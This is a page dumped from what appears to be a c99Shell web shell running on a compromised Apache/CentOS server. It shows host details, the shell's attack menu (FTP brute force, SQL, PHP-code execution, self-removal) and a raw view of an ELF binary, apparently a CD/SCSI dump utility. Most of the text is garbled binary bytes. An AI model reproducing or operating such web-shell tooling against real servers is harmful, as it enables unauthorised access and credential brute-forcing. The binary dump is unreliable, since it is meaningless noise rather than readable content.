!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/bin/   drwxr-xr-x
Free 52.24 GB of 127.8 GB (40.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     devdump (142.83 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
ELF4x64 (44p4p44q4qpp!!!X!HHqHq Ptd||a|a  Qtd/lib/ld-linux.so.2GNU __gmon_start__libc.so.6_IO_stdin_usedsetuidglobfree64fflushstrcpy__printf_chkisinfstrncmpstrrchrwaitgetpwuidglob64strncpysignalputsfork__stack_chk_failputcharreallocabortstdin_exitsocketpairkillrewindstrtokexeclpfgetsgetpwnamstrlenmemsetstrstrfcvt__errno_locationtcsetattrreadgetpagesizedup2__fxstat64__fprintf_chkstdoutfputcfseeko64memcpyfcloserand__strtol_internalsetsockoptmallocstrcat__strncpy_chk__lxstat64__xstat64getenv__ctype_b_locgetservbynamestderrioctlseteuidgetuidrcmdreadlinkfilenousleepfwritegettimeofdaygeteuidlseek64strchrgetlinefdopentcgetattr__strcpy_chkvallocfcntlecvtscanffopen64_IO_getc__strcat_chksetbufstrerror__libc_start_mainferrorgcvtfreeGLIBC_2.4GLIBC_2.3GLIBC_2.2GLIBC_2.1GLIBC_2.3.4GLIBC_2.0/lib/ld-linux.so.2M:/Mq5.^^^^^_$4_8_<_L______̿п0ԿؿܿٳY0Y[^,7w)K8gUa!c)4;#glz2QW DI <[g8zqC2Eldqr6zW0>>=j?DA;?G=<A)e{'q-V@B"{xo7_0jwCUl1h ?MLD<,\ =zk-S=Kb#e$.ii ii ii ii ti ii % \]Z      $(,048<@DHLPTX\`dhl p!t"x#|$%&'()*+,-./012345Ģ6Ȣ7̢8Т9Ԣ:آ;ܢ<=>?@ABCDEFG HIJKL M$N(O,P0Q4R8S<T@UDVHWLXULN5%%h%h%h%h%h %h(%h0% h8p%h@`%hHP%hP@%hX0% h` %$hh%(hp%,hx%0h%4h%8h%<h%@h%Dh%Hh%Lhp%Ph`%ThP%Xh@%\h0%`h %dh%hh%lh%ph%th%xh%|h%h %h(%h0%h8p%h@`%hHP%hP@%hX0%h` %hh%hp%hx%h%h%h%h%h%Ģh%Ȣh%̢hp%Тh`%ԢhP%آh@%ܢh0%h %h%h%h%h%h%h%h%h %h(%h0% h8p%h@`%hHP%hP@%hX0% h` %$hh%(hp%,hx%0h%4h%8h%<h%@h%Dh%Hh%Lhp1^PTRhPh`QVh US[4 tX[ÐUS=u?- X 9v&   9w[]Ít&'Utt $ÐUT$ D$D$,$zÍUSÃ,D$5$D$ $R$\$t$$$$Vv'UD$D$$jt Í&$xfUD$D$$*t Í&$@fUWVS5(E=,hl)Ӆx |ҁЉ1 h =lD$D$@$ (+ h@D$D$@$&E1G(,D$D$T$ $iOD$$D$Jt93@D$$D$ uӃ$ \uǍ@1$>t"B_v$.uރ (1ۋ,\$D$d L$T$ D$$l$[^_]Áqv'US(,ȃ@,1ң(% u1Ã[]ÍL$qUWVSQXq}EEEEt$$(Eԉ]uD$E؉D$E܉D$ED$D$ ED$D$<$I!EE܅pE؉]uzED$D$<$ E؅}ԅt)D$${E؅D$,$\  1$ u(,D$${Ĺȹ̹%̹йԹ׹عܹD$p$eD$$P3v\EmEUE$AED$$D$Eԉ$D$ D$D$owE؅4]ԅD$${E؅D$D$D$ D$D$$$t&'UD$$"$D$$D$$D$$$D$p$U t$Í&$CÐUSE]EeE1=~E$D$ D$D$uED$D$ D$P\$$cD$$FD$$pD$%$GD$<$4@t4@$$(h$Ue3uDĄ[]áh$ۀ}u D$\$$X H$@ $닍UWVS ]}th$D$ Ƹ4$D$T$;!Ѓ \$E 4$D$9t $4 [^_]f  }@E} Ћu}؉]t&]Nj 9~‰}D$ ËE|$ $D$x$6t $4f E)ƅ][^_]$MA UE]<ÐUE]@<Í'UU WMV}Suҋ]t Ft Ft Ft FFv‰ÉljƋEtЋUU tЉ‹U [^_]Ít&'UVSӃމT$ D$D$f$غ颋.D$u$)T$^D$$ )\$e[^]fUS]D$$>C<=~=v=;t&4o=X'-=Dt&A=Et&D$$ g&=t&]=)'=t&>=t&PD$$2t&D$$Eq[]g==t&h=D$o$맍v&&U&D$$bED$$H+&D$$( dt&9e&BD$D$1$t&&&uD$$y='=&uD$$eH='"=t&@D$$"D$^$ D$u$D$$D$$=Y=D$M$rD$$vY==t&`D$$B%D$'$) ==D$P$= =D$$=0X=:D$$D$0$fD$$jMD$$Q4D$$8D$<$D$$D$$D$$D$$D$$}D$ $dD$$hKD$$O2D$@$6D$$D$$D$$D$$D$[$D$g$ UVS ]u R$@}T$ E4$5 fED$pD$ m\$mm\$mm\$m@4$D$JD$D$ y [^]ÍUVSEu t$ D$D$$a8\$4$耓CD$sD$4$D$ CD$D$4$D$ Ct$ D$D$${C@.{SC@yC t&CCCf Ct$$ {w{tdCD$ D$D$4$CD$ D$D$4$C D$ D$*D$4$[^]À{u{ ut&t$ D$ D$$It$ D$D$$uC@t$ D$D$$K{t&t$ D$D$$C@t$ D$D$$C lt$ D$D$$CFt$ D$D$$C t$ D$D$$\Ct$ D$D$$,CcU(E uu}}]EE^@E싆@$D$D$lE@ECCT(C CCUCV ЈCUCVCWCXCYEC[EC\FDT]u}u]ۚD$$CGfU(E uu}}]EE^@E싆@$D$D$l#E@ECCTC CCV ‰CVSUCWECXFD\]u}u]vD$$C<\&USU]M E=~EUM ][]=u[]'U(E]]uu }EEEEx@D$D$l<$GUGTGG ؈GUGVGWGXGYEGG%tOUE@Dd]Eu}]ܘUWVS,}E U_@EUeE1D$D$l$BECUCT\C CC CWC[C\  ЈCUGDo<$DuE] E E E E E ËEtU2M܅tE܉W(uJU UtB1҅t1)kdd!‰ЋUe3u=,[^_]ødڍ D$ D$D$$6vU]]}}us@D$D$l4$E ~FT]FFUF FS ЈFUF[F\CD$x+V]Ћu}]Ít&Uuu}}]^@D$D$l$@E {CTYCCUC CV ЈCUECXC[C\FD4$;]u}]Ít&'UVSu^@D$D$l$SUCT[CC CCF ˆSUE CVECYEtSUFD4$蠕[^]ÍU}}uu]_@D$D$l$E ECTCC CCUCW ЈCUCVCWCXCYEC[EC\GD<$]u}]Í&'Uuu}}]^@D$D$l$PE {CTTMCCUC CC<V ȈCUC[C\FD4$@]u}]UWVS }u_@D$D$l$E ECTCC CCUCCW ЈCUCVCWCXCYEC\EC]ECZEC[GD<$聓 [^_]ÍU}}uu ]_@D$D$l$CUCCTSC C CW ЈCUVCCCCGD<$ْ]u}]É'U}}uu ]_@D$D$l$@CUCTSCC CW ЈCUVCCCCGD <$6]u}]ÍUEuu}}]X@D$D$l$E CTR{CEC CCCUCVCWCXCYC[C\E@D$胑]u}]ÍvUED$ D$D$E D$E$! Uuu}}]^@D$D$l$E {CTQCCUC CCV ЈCUC[C\FD4$誐]u}]Ív'UWVS }u_@D$D$l$E SUECTDCC CCG ˆSUEt SUCVCWCXCYEC[EC\GD*<$ [^_]É'UWVS }u_@D$D$l$VE SUCTCsCC CCG ˆSUEt SUECZC[C\EtK]@EtK]GD6<$& [^_]Ít&'UWVS,u} eE1D$D$$D$D$D$ D$\$4$f =eD$D$D$ D$\$4$xi1tLT D  D D 1D$?$Ue3u,[^_]ø Uuu}}]^@D$D$l$PE SUCTC{CC CF ˆSUEt SUECVECZC[C\FD64$1]u}]ÐU8uEu]eU1҉}}D$D$$D$D$D$ D$\$4$xef ~Mt 1t1Ue3u9]u}]ÍvN$tD$V$fUuu}}]^@D$D$l$E SUCTB{CC CF ˆSUEt SUEtCV@E CWECZC[C\FDn4$j]u}]Ív'UEuu}}]X@D$D$l$E STCT;{C EC CBEBBBBBBBE@D~$譊]u}]Ít&'U(uEu}} ]EE^@E$D$D$lECCTf  "t3   ‹tttXC$E D$D$D$ D$|$$=FFk$1t} u?1Ue3U<[^_]Ðt&C$~ofD$D$<$(C$D$D$ |$$D$k$1jD$H$LU D$D$D$ T$|$$xrt$   ‰$0E D$ |$$D$x,6FFst&UWVS<(ueE1D$D$$D$D$D$ D$\$4$ fD$u$ X\$hD$D$\$ D$|$4$xpD$$\$|$$1Ue3u`<([^_]ÍvF$tF(~D$Y$뽸붋F$uD$$u腵'UWVSE u}EE^@EEED$D$l$DESUCT{CC CF ¸SUMu }Ѓ ‰SUCXN(t3U츳t=D$$|$E$D$fFDu[^_]l뼍vU$t$u=] MUEt$t$]kx4$V<$)‰T$d1҉ЋUe3u ]u}]褲&US]$.Wt$!Wt 1[]Ít&$XW!t$$KW uډ$~W []É$gWu []É$PWu'US]$Vt1{$~[]É$i1[]É$VuՉ$Vt$Vt $Vuf뭍&'U]]u}C$$Bxk$]u}]É$ S$ƅBC$y׋E 1S$etO$V;} tL$yC@@(uՉ$U$EUu}:t}0u{$~k$1dk$S$phڍ&'UWVS<E eU1ҋ]D$D$4$X|$D$D$D$t$ D$D$*$,uA$TuD$<$nu1ۋUe3<[^_]Ët~vFfV  t=~FfV t=~)ًAt \$4$D$Z]L$4ufCt&'U(]]uu }}eE1C$D$$Tk$t9QAtf yv5AfQ 1tUe3u#]u}]ÍvAfQ t&U(}} uu]fxDGD$D$4$5ЃD$ xt&1]u}]ÐD$<4$pu܉4$R4$Rt:t0ufxD$D$$D$$wo'Uuu]^@4$6x]u]Ív1{ 4$QtG4$Qu 4$Qt<4$Q$ ^4$yƉ4$y몉4$fQp'UWVS,u} eE1F$4$n$D$D$$uF$D$D$ ?D$ \$4$6DžD$D$$V u+n$Ue3,[^_]ÍD$D$ ?D$\$4$8xD$$<褨9v.t&D$$$?D$~C\9w$ 趨:t&N   ‰D$D$$D$D$ D$ \$4$Kn$DžD$$D$譧D$$  ‰T$vD$$  ‰T$?'U8uu }=eE1]]9tC$$Wu%k$5Ue3u@]u}]ÍD$D$ ?D$D$$!rUWVS,}eE1<tUe3 ,[^_]Í$D$D$ D$<$G$\$<$Ko$t$<$tD$*$ӥB< < D$J$襥$V AuaD$ fD$D$v$c BuaD$ D$D$v$- AuaD$ D$D$v$ BuaD$ D$D$v$ AuaD$ D$D$v$苤 BuaD$ D$D$v$U AuaD$ D$D$v$ B uaD$ D$D$v$ A uaD$ D$D$v$賣 BuaD$ D$D$v$}$ AuaD$ )D$D$v$; B uaD$ CD$D$v$ AuaD$ ]D$D$v$ϢBt. uaD$ T$D$v$蓢 yxaD$ $D$D$v$] B@uaD$ wD$D$v$' AuaD$ LD$D$v$ zxaD$ D$D$v$軡 AuaD$ D$D$v$腡Bt. uaD$ xT$D$v$I A uaD$ D$D$v$ B@uaD$ D$D$v$ݠ A uaD$ D$D$v$觠 BuaD$ D$D$v$q AuaD$ D$D$v$;$  BuaD$ D$D$v$AZ$ -BD$cD$Y$ D$ 覟 AuaD$ D$D$v$p BuaD$ PD$D$v$: AuaD$ |D$D$v$ BuaD$ D$D$z$Ξ AuaD$ D$D$v$蘞 BuaD$ D$D$v$b AuaD$ D$D$v$,$ pPf@  ¸#QfA ¸Pf@ ¸zRfA ¸谱zA Q D$D$ЉD$ $IxxXf@D$T$ ӉT$f1 |$D$!$˜FfFD$k$ ډ\$蠜FD$5$D$tغ.D$u$T$P^D$$ T$.9E\$D$P$D$ED$ED$ ځoUWVSu]}U~Ft#FFFxF F V C$$k$tG@|$ D$Et$$D$x[^_]fC$$k$@D$ D$Et$$D$8yS$1uE D$$D$耞Et$$D$y51[^_] UWVSLEU]EUE U$eE1҉tCuDžD$D$$ޞC$$RU D$t$D$T$ $-~u C`$E D$$D$ T$D$C(k$u=p3 $ &$)D$T$3pC(tG|$$D$3rk$~GK$1uD$$D$@Ue3)L[^_]Ívu0D$$T$KyD$$D$ǛuGt09|?9E t7U D$D$$T$T$ sk$ttlD$D$$:C$$E k$D$D$ $T$D$C(tlD$D$$进C$$3E k$D$D$ $T$D$8C(tlD$D$$IC$$E k$D$D$ $T$D$莾C(>D$D$$ϚC$$CE k$D$D$ $T$D$K(!$"$)T$D$C0D$P$T$[~$3"$)‹T$D$/$"$)‹T$D$/L$!$)‹T$D$/1D$_$T$N 1D$$T$)]1D$-$T$1D$B$T$ߗU$]u&|$|t t$$9|؋u]]ÐU$z融ÍUWVS<E }UMeE1Džt‹Džt tÄt@t47t.,CD$4$xtދ@tz~t9Me3 <[^_]$xB4$螋 !t$ D$D$$舥3$S < < D$ 4$wsC< < D$ 4$wzCs< < D$ 4$[w>>Cs< O< GD$ 4$wZ:u:Fu:F8$vD$ D$ D$$v~D$$J}t&$PvD$$(UD$$<< /< i< xf$ $LjCD$ D$ D$4$uD$ 4$9uW'D$ 4$uljD$4$D$$ǒD$ 4$tcaD$ 4$tU(]1u1҃;t ]u]EE9uEU]u]Ít&ED$ $1t<*t7 tp;utW_hyɍCD$D$$I~ _h딋GhtU[^_]+u[^_]ÍUS]te M1ɉ$PD$ D$ D$$pUe3ut[]rt&UWVS1ۃuUPhE~R9ƉZ\$|$$聝UBh)9~$)؉D$D$E$1~9܃[^_]É뢋UE[^_]&UWVSeE1ɉ~81t&)~ދ$9ϋEe3u [^_]qvUuƉMMeE1]}$PE]D$ D$ D$$oEC<vQAEt+F ~ED$D$$Ue3u ]u}]pM$PFM$PUD$ D$ D$$Sn~8Nt1҉Åt1=~ $ى;F ~%EUD$ED$T$ D$$vlU@'U(]]Mu}׉E$*o#lt$\$<$9t EsME]u}]v'U}}]ueE1Wht5uE D$D$P4$D$ Cډ4$/Ue3u ]u}] oUEPhtE]]Ð&UEPhtE]]Ð&U(uu]U eE1M}]Fht"xɐt&x xf~Ue3ub]u}]Ë8x܋t҉\$L$T$ D$D$D$$螘$mU}}eE1U ]uGht x~1Ue3uM]u}]Ð0PT$ D$D$D$$$SHmU}}]ueE1Wht5uE D$D$P4$D$ 萗ډ4$Ue3u ]u}]lUWVS|EeU1҉p@‹@hR&FD$FD$F D$FD$FD$ D$@D$ $֖ËF ߉D$؉D$FT$~ Fg1Lh|$D$$9t~-\$D$$݀9tXF)؉F?F +F$F( FLx FL $N+1Ft~$1ۋUe3uo|[^_]Ív^@{\$1ۉD$$dT1F 뒅h176jv'US]Clt$hChCltx u []ÍvE+؃[#]&UWVS|}eE1Gh0]U D$.D$P$T$ *4$y]WhE;~K=]?fE-=E~(D$\$ D$D$4$ixƋWhE99}Y=]fE-=E~(D$\$ D$D$4$aixƋWhE9|bE $iÉGlUe3um|[^_]ÉO `D$D$;$,WhE=_ ~ED$H$D$q1h<$vpt&'U}}u]Ghtot$LfGhǀt$-fGhǀt$fGhǀx u1]u}]Ít&Uډ$V;ƋGhǀ$fGh붉'U]]u}׉EL$ eE1$D$[D$PoE`$Ɖ$ftE4$Ue3u ]u}]zf&'Ut$u$E ^hu 1$t$]à w$ģٸҋt,t.뮋t31ɉ^h^h뻹^h붍&'UE]U u}xe M1ɋXpp txx,~>apBtMe3 ]u}]Ãxp_h)ttthtxpBttD$oD$$Nyt&$d9xt$\$ D$L$D$$0tD$:$aj D$ D$6D$$踎D$:$Dat D$$ ` UD$@$`c)=\$vD$ D$D$$pA ~-t$|$ D$$D$~$y`$_`df04$1dD$ D$D$$_i/c||j$6bD$$`atD$$GaZ$ F}$6`t$D$$}pGtD$\D$$虌ۉ0Dž$a‰Gh@ǂǂǂǂǂǂǂdOaދ$3| $`$_||p|BhB ]D$\D$P$|$ N|ap$|p\|ƋpI|p8|Ëp%\$t$D$ p$epBhǀDž1$_q_Q9t$^N_Ga9tB$`$`/$w]D$$` ^$^pD$$\zWD$T$L$ D$ @D$$]|Dž D$$yXD$$|$y$\ID$$-L$dy$T\D$$[D$$ZD$$ZD$/<$\tPT$D$L$D$D$ DD$<$\|$$Gx$[$4x$['U(E D$D$D$f$D$~D$ D$D$k1ÐUUM tM U]HDt`t ɸ@t1]Ít&UE]JfUuu]] \$4$P~9FT؉^X]u]Ét&U]] uu 1]u]É\$4$9\$4$PFpՍ'US]$PCp[]ÐUE]J fUE]J(fUE]J,fUE]J0fUU EPd]fUE]@@@fUE@@Px@])Ë@]Ít&UE@@H uP$t ]fx(ux+]Í&'UE]@@@(ÐUSEX@$1҅u[]C+o~C-؍'USEX@$K1҅tC+Ѓo~S7[]Ív'USEX@$ tC+o~ C8[]Ã1[]ÍUuu}} ]Fx^|)Å~\$D$<$_l<$#YF|Fx؋u]}]fU1Mt T$ $Í'UWVSE] }D$6D$ \$E$胄xqu)ƋExjE3&T$ D$\$4$Hx6)ËEE9Et.B^vD$q\$4$yʃ[^_]D$ \$4$x+E[^_]UWVSE] }D$6D$ \$E$賃xQu)ƋExJE&)ËEE9Et*D$\$4$D$ by΃[^_]D$ \$4$Bx+E[^_]UED$D$ED$ E D$E$"UE@@P TD$ ED$T$D$E $ɉ!ÐUWVSE}U X@C(EC(D$|$$D$ 艂xfu )ƀ{(xo{)C(vRC(if%f=t T$L$ D$|$4$)x+E [^_]Í&$<UBD$|$4$D$ x)ǀ{)jUBD$|$4$D$ 蹁x)>]E(;81K'P  U(]]ueE1D$t$$i~$D$t$$oh$-UEe3u ]u]BVU8Eu}}]X@$PƋC~Cu1ҋ]Ћu}]ÉD$D$E t$t$ D$|$$yxċE ЃdE~d)׋UD$D$|$$D$ \xU+U |t&'UMb(}}uu]G@O`@D$Y)ډT$D$t$D$ E $x(] Ã(~)Ɖt$\$<$xÉ+E ]u}]U(Euu}} ]X@C~Ct1ҋ]Ћu}]Í&D$D$ D$t$<$4xȍECd~dD$)D$t$D$ E$xU)녍t&'U18uu]]}~(F@@D$FD$F D$FD$FDD$@\$D$ E $~x@} )É\$4$lj|$fx%ǃ~(~)É\$|$4$xlj+E ]u}]Uuu]^|+Vt\$4$)ЉD$"É^|]u]ÍvUS$]EEK|D$E D$X\ʉD$ +St $)ЉD$}x C|$[]ÐC|$[]fUVS] u{C~Ct&D$D$4${Ѓv)T$D$4$t{E u[^]_{$D$4$H{[vD$4$0{Ѓwtm&D$4${Ѓf<D$4$z3D$74$z@CD$4$zD$4$|zD$4$gzD$4$RzD$4$=zD$4$(zD$k4$zD$X4$yD$J4$ypD$D4$y[D$>4$yFD$04$y1D$'4$yD$4$yD$4$kyD$4$VyD$4$AyD$4$,yD$4$yD$4$yE <`[D$4$xZ&'UED$$Ít&UWVS }E u]D$6D$<$wxt&T$D$<$\xxB^vD$q<$9xE } [^_]!xUED$ E D$ED$$XÍUWVSE}]EE D$6<$D$wEx$1D$<$D$w;uuE }[^_]wfUED$D$ E D$E$iÍ&UE D$ED$$Í'UED$ E D$ED$$ÍUE@@P TD$$T$Ð&U(E]up@$ËF~Fu ]u]ÉD$D$\$ \$D$$hvd~dD$$D$&]u]ÍUSEX@C~Ct[]ÉD$ D$D$$uCd~dD$$D$[]Ív'UMbVS ]C@K`@D$q)T$ D$D$$uu{(~$ [^] aUWVS|EU e M1ɋux@EUG t::.t*9]D$ D$CD$@$tvڋMAD8tD$ET$D$ Mt$D$G$$i|x9])ƋUt$É$\$x)ƃ G(u/+UЋUe3|[^_]øwG+EGLUt$$D$ T$xËM)֍G(D$ED$L$ t$\$$Rym:EMbH`GD$Y)ډT$]D$D$@$D$ uMt$\$ $:)>JfU(E]] u}}$pt3]tvU8E]] u}eU1ҋPhp@E;tgEEEEEEEPEZu4ED$D$4$x(tău,E|$D$"4$=y뀐>uE͍'US]Clt$S=Cl[]Ív'UWVSx'<[^_]ËUBht.xοNjU E9~ʉƋU 븋U E멐UXM̋M]Éuu}}ɉUx\Ủ)ЋUE t!]Ћu}]Í&UЍED$D$S$R:1҅uʋC ~$ED$D$ ED$$UdED$ED$S$:EK ЉUԉUɉUԉE~3D$ET$UD$D$ET$ D$$cEỦU܋EEU tEԉtU؉fEWv'Uuu}} ]F ~|$D$>$Jca6Í$4;1҅tFlFh]Ћu}]Ít&UWVS UJhRhEE1B EPh&1ۋE4Drx$N9EPhfDruσuŃE}u1t$$7UBhǀǀ1 [^_]UWVS UZhRhEE9tJfDŽB1v1ۋE4Drx$8EPhfDruσuŃE}ut"$27EPhǂǂxNfDŽzE1ۉE4Drx$7EPhfDruσE}u1 [^_]Ív'U(U]M u}t9Zht;Rx9t0Vtt ft.1]u}]Ãt t߅ɸtҋ xȉؾQؿhD$g)kdD$$)ЉD$ )ωi'|$ ))ˉ\$aVɸIBUED$@t$`Í'UWVS\U MEt$$eE1T$3u%=`t1Me3 \[^_]Ët$$L$4u%=D$$L$K3y 1󫍍D$s $5t,D$s$5uD$$MPD$l$9PD$$%PD$$P1D$ D$uT$$^qc:T:BD:B4:B$t?:W:CG:C7:C'D$ D$ D$$1D$ D$ D$1)Љ$1D$ D$ D$1)Љ$r1D$ D$ D$1)Љ$:11)Ћ:u):Bu:Bu:Bt ֹ8u1y(d1ۋQh&Z <t-9uZ!9uZ 9u6؋f|BL$\$ D$T$D$$,M1t&D$D$ $v2@=sƄDžfM/ $ 1Ë! t€u҃+D $i1$D$0 $0D8/D$/ $0/@T$$r1hD$PD$<$~.t$ $0t*1ۉt$$0uoEpK:u0q:Bu$r:BuD~ DŽhtTu11t $/tuDžt_ƅDt0D$D$s4$*.D$D4$D$.up$/.=L$ D$T$D$$=J1M/T$ D$0$T$J1T$ \$D$ $IDžU! t€u҃+A$.tD$$-vD$D$$Ƅ -ZfDž/$,Dž$Z-CDžaƒ(҉҉Ѓ({fLBZ  Z PhZ Z! ȈZ  y T$(T$\$ D$$D$T$\$L$ D$D$4$Ut{r`Btt\$ D$D$$=x$Džh@`Bt%\$ D$D$$=Džhx1$DžhN1G`Ct\T$ UWVSLReE1G  Bh;LDžP1CCGCGCt&D:TD  t;W |D  uuwD$\$B$9t!t$ D$BD$D$k,GG$GLD$\$B$z`sG9)Gt"tt$D$$;G(D$D$$,G+D$D$ $,G {t1G$1G(uG$ЋUe3L[^_]1G(ۉD$D$$+)‰T$D$ D$ $+WG )։GG\$D$$;DžӃDžq8>G$u1G G  @8>G$1G UWVS$$eE1$Rp@҉(~ $JhB;$V;P4t($Jh;U$X ~'FT$$D$< D$ $7~?H,FG$@lV0$4D$D$$$n*40C$PhC ~1ҍvD2TD$9Fu)T;$9tFT$ $D$8~$@@(\$T$$Q ;@t'@D$T$ $BD$D$($Ph;C4(\$D$$ FtK$9tFT$ $D$;8C F F${ 2F F$)F{$P(~Fx ~?C$D$C D$CD$CD$ D$ D$$5$1ɋP49Vt (G1ɋUe3[^_]Ë$@h8 ӋF,8; 뗋@FDž4$0F{N(F+FLD$CD$$6N$F$1F F$KnB܉),$F(]D$D$l$U'F+EFEEEEEEVU ЉڈEًFE܋$zkF+EFL]V$<$[~$B`t<;StHF F(F$F o,$D$$T$y5,xF$F .$BX8<$ 8$H ~,‹@XD$ BhD$p D$$2$@h8u$B` $P4(Tv'Uh}}]uWw@x$Ghf~)]u}]Ív1F F$ލ]D$D$@$#%ESFEF EFEFEEčFTEȍF+EiFM\$ED$"G$ËG ~\$D$3$1ZEF(EFLG ~&ED$ D$ ED$$c1Efthfft&^<$G`; u5x,F$F #E1~EF ~$uF$EF1_EtMF$uF$~+t9~(u3FLF(uFL~-u~7u~8uF(F+FLF t뉉<$~KG`>F(F Z/F$t&u"t t&|t&Whfxufǂsv'Uuu]}eE1V^@?{ ~-C 1C$Ue3]u}]Í}D$D$,<$T"UD$D$@$9"CECtEK ~1Ґt&DT:9S CEԋEЋC@E8EEiC|$D$SEF$ Ct.3M9t%UԋC9wqD$L$4$EԋS9wPC xOC(1CC C$CDEEL)ЉC몉닋C$E܀8uxtC$tES+CLEC+EBEBEB EBEBEBEC(BE@t 3C C( #t&+-C$~ |$D$ $t-Vu t vtE1UU EP4]fUS]C\t$C`t$C@t$ut$ct$QCht$B$^Ctt$+][]fUVS1ۃ$fD$D$$V@D$ D$D$4$ FF4FL$F\ty$F`tf$lF@tS$Ftt@FxF|$$t$u 4$1e[^]ÍUS]$n$61[]Í&'U]uut5$8 t$$P賍t$$P$]1u]Ðt&UWVSLU Ee M1Dž҉tUMP H,ƅt>1Dž11҃ `t5D$ $6*D$ D$D$$uurU~4CD$C D$CT$D$ D$ $)L$$費Ue3L[^_]ËtD$ t$$t)u[CD$C D$ CD$$ D$$A)-T$L$$D$ uufD$D$ $(넋D$D$$D$ a u1f t勵h󦋍8uG΍D$L$$EF<(<:ƅD$:4$E<@rD$,$DžDžDžDžDž?Q11҃t(Ctt!D$ uD$6t$$($14&uD$D t$$S(D$:$YD$:$CG<,1Dž+~ DžD$ $t$D$zƄ5D$,4$ D$ $T$EDž/t/T$UL$ D$ D$T$ $&1D$<$8,tPt͉|$ D$h ut$$&Dž1ɋfDž1ɀxPBD$<$8;M1ۋ|$ D$k L$4$%DžD$$D$mE$D$f,t<U|$ D$ T$ $W%nDžPxD$$8u'Dž |$ D$ 9U(]]uu }}tE|$t$$D$ R$UCs{ S]u}]ÐUWVSMEu }t{1ېt&t9tu`B9uB[^_]Ã@t}MpuV|$ D$4 ED$U$#E[^_]Ã| r=`b`X1u~*t$ D$<띉|$ D$ 돉|$ D$ 끉t$ D$<p'UWVSueE1}] MЃoadDžlDžpDžxE/DžX<Dž\<Dž`DžhDžtDž|EEE<~"<$Oyy";u uv<$2t&x߃ u+E [^_]É'UE D$ED$$oÐU(uu]]}} 4$t"4$u]]} }E]6\$t$ D$<$^4$څu]Ћu}]É4$uD$$ŐUWVSE$X59|2&Љ)9}΋tevD$$ljD$)Ѝ@RD$$E=5$[^_]Ív$D$\$lj$}D$ |$$eu[^_]Ít&UVSu4$Y;}M[څt&92t"Ru$ t‹CBSE 2B[^]É몍'US]$;}*@t9t @t9u@[]Ã[]01[]Ð&Uuu]] 4$uu É] ]]U$ÐUWVS }vu$4$&E |$D$E$xσ [^_]UWVS1ۃ}]u EECEfu7E$E|$t$$|t )E~׋][^_]ÐU(EEED$ED$E $u1D$ED$E$x܋ET$$D$4ÐUWVSMu< t1< t-<+<-Eu(90f < uŃ< u1u$8P9}(ƍ<tB< vݍB<Zv#vEtߋE 8[^_]Íw P멍vP랃EJE;&ÉD$$U<+<=tPtOtW&t2(?FuVFty,ttft?t*u~ vt&UBE쉕9PF뎋}t 4Ctc<-v{M1ҋ} UBE쉕<VCUEDž҉E1t1:ut&:t9u9 fBQu}ÉD$$uoWOȃ+<vuOD$$t3~/1:u:\  9u,t)E&,uߋ] UBE艕<1 tZ<,QI is needed. Cannot put tty into normal mode Zone, zone offset: %14llx %12.12llx Only one of -i or dev= allowed Enter new starting block (in hex): . %s%sCannot open SCSI driver. Cannot get SCSI I/O buffer. Read error on old image Seek error on old image %s: %5d kB/s (CD %3ux, DVD %2ux) Device seems to be: unknownAdaptec 4000/4010/4070Adaptec 4000Adaptec 4010Adaptec 4070Adaptec 5500Adaptec 4520AAdaptec 4525Emulex MD21Emulex MD23Generic NON CCS DiskGeneric CCS DiskSony SMO-C501Emulex MT02Sysgen SC4000Maxtor RXT800SBerthold HR-ScannerMicrotek MS300AGeneric CD-ROMGeneric mmc CD-ROMGeneric mmc CD-RGeneric mmc CD-RWGeneric mmc2 DVD-ROMGeneric mmc2 DVD-R/DVD-RWPhilips old CDD-521Philips CDD-521Philips CDD-522Kodak PCD-600Philips CDD-2000Philips CDD-2600Yamaha CDR-100Yamaha CDR-400Plasmon RF-4100Sony CDU-924SRicoh RO-1060CRicoh RO-1420CTeac CD-R50SMatsushita CW-7501Matsushita CW-7502Pioneer DW-S114XPioneer DVD-R S101Missing Entry for dev %dSectorsize: %ld Bytes Device type : Version : %d Response Format: %d Capabilities : AENC TERMIOP RELADR WBUS32 WBUS16 SYNC LINKED CMDQUE SOFTRESET Vendor_info : '%.8s' Identifikation : '%.16s' Revision : '%.4s' capacity_not_setread_g1read_g0blank unitread buffer capBFree: %ld K BSize: %ld K send_cue_sheetread master cueclose track/sessionread track infosend opcread dvd structurereserve_track_rzonereserve trackread disk inforead headerread tocSession info too big. Cannot read TOC header read subchannelwrite_bufferread bufferflush cacheseek_g1seek_g0write_g5write_g1write_g0qic 02set cd speedset streamingscsi_set_streamingstart/stop unitprevent/allow medium removalmedium load/unloadread capacityrequest_senserezero unittest unit readytocheader: mode sense g1Mode Sense Datamode sense g0SaveSet %s Mode Parametersmode select g1Mode Sense Data (converted)inquiryInquiry Data :TOC data: ENT: B0: B0 start: %ld B0 lout: %ld Cannot read TOC Cannot read CD-Text header CD-Text len: %d Cannot read CD-Text wctbcdtext.datmode select g0CD capabilitiescaddythisTry to load media by hand. Density: 0x%X Blocks: %ld Blocklen:%ld Pages: 0x%X Drive capabilities, per MMC-3 MMC-2 MMC page 2A: not read CD-R media Does %s%s write CD-R mediaread CD-RW mediawrite CD-RW mediaread DVD-ROM mediaread DVD-R mediawrite DVD-R mediaread DVD-RAM mediawrite DVD-RAM mediasupport test writingread Mode 2 Form 1 blocksread Mode 2 Form 2 blocksread digital audio blocksread multi-session CDsread CD bar coderead R-W subcode informationreturn CD ISRC informationsupport C2 error pointersdeliver composite A/V dataplay audio CDs %s: %d send digital data LSB-firstLength of data in BCLKs %s: %s Loading mechanism type Is %s%s support changing side of diskMaximum read speedCurrent read speedMaximum write speedCurrent write speedRotational control selectedBuffer size in KB Write speed # %d: %sInquiry Data : EMULEXADAPTECACB-4520ACB-4525SONYRXT-800SACERCR-4020CCREATIVECDR2000GRUNDIGCDR100IPWJVCXR-W2001XR-W2010R2626MITSBISHMITSUMIOPTIMACD-R 